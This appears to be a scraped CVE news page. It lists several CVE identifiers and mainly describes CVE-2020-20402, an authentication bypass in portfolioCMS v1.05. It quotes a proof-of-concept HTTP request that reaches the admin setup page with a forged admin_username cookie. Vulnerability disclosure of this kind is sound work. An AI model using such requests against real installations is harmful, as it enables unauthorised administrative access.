CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

CVE-2023-6905

CVE-2023-6903

CVE-2023-6904

CVE-2023-3907

Westbrookadmin portfolioCMS v1.05 allows attackers to bypass password validation and access sensitive information via session fixation.

allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page.

GET /portfolioCMS-master/admin/setup.php HTTP/1.1  
Host: 172.16.100.15  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Connection: keep-alive  
Refere:http://172.16.100.15/portfolioCMS-master/admin/  
Cookie: admin-menu=%7B%220%22%3A1%2C%221%22%3A1%2C%222%22%3A1%7D; admin\_username=admin; PHPSESSID=u25c0656jai48kjhvo27kl2loq  
Upgrade-Insecure-Requests: 1

CVE-2020-20402: allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page. · Issue #2 · Westbrookadmin/portfolioCMS

Headline

CVE-2020-20402: allows an attacker to use GETS method to request /admin page to bypass the password validation and access management page. · Issue #2 · Westbrookadmin/portfolioCMS

CVE: Latest News